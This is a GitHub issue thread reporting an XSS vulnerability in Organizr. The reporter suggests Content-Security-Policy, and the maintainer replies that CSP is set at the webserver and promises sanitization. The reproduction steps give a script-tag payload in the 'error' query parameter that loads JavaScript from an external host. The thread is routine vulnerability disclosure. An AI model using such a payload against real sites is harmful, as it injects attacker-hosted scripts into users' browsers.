### ISSUE TITLE
XSS Vulnerability 

### ISSUE THREAD

**Issue by cunderw** [causefx/Organizr#1291]
###### Operating System: Ubuntu
<hr>

##### Problem Description:
Organizr is vulnerable to XSS attacks
This is a pretty serious security concern for users. 
Suggest supporting Content-Security-Policy: script-src 'self' and relying less on inline scripts.
<hr>

##### Reproduction Steps:
For example append ?error=<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> to the URL of a hosted organizr setup. 

<hr>

#### Errors on screen?  If so paste here:

```

```

**Comment by causefx** [comment]
CSP is set using the webserver.
I'll sanitize the rest.
